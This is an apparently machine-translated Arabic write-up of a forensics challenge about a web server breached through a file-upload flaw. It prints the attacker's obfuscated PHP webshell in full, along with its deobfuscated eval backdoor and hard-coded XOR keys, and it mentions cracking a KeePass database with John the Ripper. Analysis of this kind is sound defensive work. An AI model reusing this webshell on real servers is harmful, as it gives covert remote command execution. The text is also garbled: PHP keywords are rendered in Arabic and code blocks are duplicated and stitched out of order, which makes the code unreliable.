لقد قمنا بتغطية سيناريو الاستجابة للحوادث الذي يتضمن استخدام مهارات الطب الشرعي للتحقيق في خادم ويب تم اختراقه من خلال استغلال ثغرة أمنية في تحميل الملفات، وقد حصلنا على webshell الذي استخدمه المهاجم بالإضافة إلى ملف تفريغ الحزمة الذي يتضمن الحزم المتبادلة بين المهاجم وخادم الويب أثناء كانوا ينفذون الأوامر.
قمنا بفك تشفير البرنامج النصي باستخدام تشفير base64 وXOR وضغط Gzip للكشف عن الأوامر التي نفذها المهاجم بالإضافة إلى المخرجات المستلمة.
وجدنا أن المهاجم قام بتنزيل ملف Keepass المشفر بـ base64 لذلك استخدمنا keepass2john لاستخراج التجزئة وjohn the ripper للعثور على كلمة المرور لقاعدة بيانات كلمات المرور التي تحتوي على العلامة.
احصل على ملاحظات الطب الشرعي للكمبيوتر
الدورة العملية الكاملة لاختبار اختراق تطبيقات الويب
وصف التحدي
اكتشف أحد المهاجمين ثغرة أمنية في خادم الويب الخاص بنا تسمح بتحميل ملف PHP عشوائيًا على خادم Apache الخاص بنا. على هذا النحو، قام المتسلل بتحميل ما يبدو وكأنه غلاف غامض (support.php). نحن نراقب شبكتنا على مدار الساعة طوال أيام الأسبوع وننشئ سجلات من tcpdump (قدمنا ملف السجل لمدة دقيقتين قبل إنهاء خدمة HTTP للتحقيق)، ومع ذلك، نحتاج إلى مساعدتك في تحليل وتحديد الأوامر التي كتبها المهاجم لفهمها ما تم اختراقه.
أبرز مقاطع الفيديو
يوجد أدناه نص php webshell المبهم
<?php$V='$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u );الوظيفة ش)x(
بعد إزالة التشويش يصبح
$k=”80e32263″;
$kh=”6f8af44abea0″;
$kf=”351039f4a7b5″;
$p=”0UlYyJHG87EJqEz6″;
الدالة x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o=””;
ل($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
$o.=$t{$i}^$k{$j};
}
}
إرجاع $o؛
}
إذا(@preg_match("/$kh(.+)$kf/"،@file_get_contents("php://input"),$m)==1){
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
طباعة("$p$kh$r$kf");
}
يمكننا اتباع عكس العملية المذكورة أعلاه لفك تشفير الإخراج الذي يتلقاه المهاجم (كما هو موضح في wireshark)
@gzuncompress(@x(@base64_decode($encoded),$k));
على سبيل المثال، يتم ملاحظة الإخراج أدناه في حزمة Wireshark الأولى
0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5
إذا قمنا بتجريد $p و$kh و$kf منه، فقد ينتهي بنا الأمر إلى $r
QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy
ما ورد أعلاه يتوافق مع الإخراج أدناه (إخراج أمر id)
uid=33(www-data) gid=33(www-data) مجموعات=33(www-data)
تجول الفيديو
https://www.youtube.com/watch?v=VSgdzLoCWl0
;$P='++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match(" /$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents(';$d='u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i <$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i';$B='ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k)) ;pru)u)int(u)"$p$kh$r$kf");}';$N=str_replace('FD','','FDcreFDateFD_fFDuncFDFDtion');$c='"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@ bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@';$u=str_replace('u)','',$V.$d.$P.$c.$B);$x=$N('',$u);$x();?>
بعد إزالة التشويش يصبح
$k=”80e32263″;
$kh=”6f8af44abea0″;
$kf=”351039f4a7b5″;
$p=”0UlYyJHG87EJqEz6″;
الدالة x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o=””;
ل($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
$o.=$t{$i}^$k{$j};
}
}
إرجاع $o؛
}
إذا(@preg_match("/$kh(.+)$kf/"،@file_get_contents("php://input"),$m)==1){
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
طباعة("$p$kh$r$kf");
}
يمكننا اتباع عكس العملية المذكورة أعلاه لفك تشفير الإخراج الذي يتلقاه المهاجم (كما هو موضح في wireshark)
@gzuncompress(@x(@base64_decode($encoded),$k));
على سبيل المثال، يتم ملاحظة الإخراج أدناه في حزمة Wireshark الأولى
0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5
إذا قمنا بتجريد $p و$kh و$kf منه، فقد ينتهي بنا الأمر إلى $r
QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy
ما ورد أعلاه يتوافق مع الإخراج أدناه (إخراج أمر id)
تجول الفيديو
